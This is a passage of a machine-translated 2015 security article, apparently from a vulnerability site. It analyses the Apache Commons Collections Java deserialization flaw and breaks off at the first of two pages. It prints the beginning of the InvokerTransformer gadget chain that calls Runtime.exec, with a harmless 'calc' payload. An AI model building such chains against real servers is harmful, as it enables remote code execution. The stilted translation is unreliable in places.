common-collections in Java deserialization vulnerability leads to RCE the principle of analysis-vulnerability warning-the black bar safety net

2015-11-12T00:00:00
ID MYHACK58:62201568893
Type myhack58
Reporter 佚名
Modified 2015-11-12T00:00:00

Description

0x01 Java deserialization leads to the vulnerability principle and the PHP reverse sequence, as also is due to the user's input can control our incoming object. If the service end of the program not the user can control the serialization code to be verified but to directly deserialize to use, and the program running in some of the more dangerous of the logic such as eval, login verification, etc, it will trigger some unexpected vulnerability. In fact, this is not a new problem, related to Java deserialization causes of vulnerability can be seen: the https://speakerdeck.com/player/2630612322be4a2696a31775f2ed005d The slide to find out. And this time, the main look at in a special environment, deserializing the ability to achieve remote code execution RCE in. With reference to Article 3 in the given exp, and in the zone with a lot of discussion, with the github jar file to generate a serialized string, and then sent to the vulnerability of the site will be able to trigger. On the use, not the focus of this article is. The problem from the common-collections tools of each transformer speaking, these transform is mainly used to Map the key values to be transformed. ! Which, foreign researchers found that class InvokerTransformer in the transform method allows through the reflective implementation of the parameter object to a method, and returns execution result. ! We have to write a code to test it: `` @SuppressWarnings({"rawtypes", "unchecked"}) public class VulTest { public static void main(String[] args) { Transformer transform = new InvokerTransformer( "append", new Class[]{String.class}, new Object[]{"exploitcat?"}); Object newObject = transform. transform(new StringBuffer("your name is ")) ; System. out. println(newObject);

} } This creates a InvokerTransformer object, and call its transform, the parameter a StringBuilder object, after the execution the output will be a string. your name is exploitcat? You can see that through the transform method of reflection, we successfully call the StringBuilder the append method and returns the result, although the process some twists and turns. Thus, we from the RCE a step closer, then who is going to call these transformer object's transform method? Call these transform methods is one called TransformedMap class, this class can be used as the native Map class to a wrapper class by TransformedMap. decorate method. Enter this class check it out: the ! [](/Article/UploadPic/2015-11/2 0 1 5 1 1 1 2 4 4 6 3 4 3 8 9. png) Here's the decorate method is external create TransformedMap object method. In the code we can clearly find the transform method is to be invoked. ! [](/Article/UploadPic/2015-11/2 0 1 5 1 1 1 2 4 4 6 3 4 6 4 0. png) As well as the entry object calls the setValue, the implementation of the checkSetValue: the ! [](/Article/UploadPic/2015-11/2 0 1 5 1 1 1 2 4 4 6 3 4 6 9 8. png) In order to figure out why in the setValue of what happens when we look at the code: public class TransformTest { public static void main(String[] args) { Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[]{String.class,Class[]. class}, new Object[]{"getRuntime", new Class[0]}), new InvokerTransformer("invoke", new Class[]{Object.class,Object[]. class}, new Object[]{null, new Object[0]}), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}) }; Transformer chain = new ChainedTransformer(transformers) ; Map innerMap = new HashMap() ; innerMap. put("name", "hello") ; Map outerMap = TransformedMap. decorate(innerMap, null, chain) ;

[1] [2] next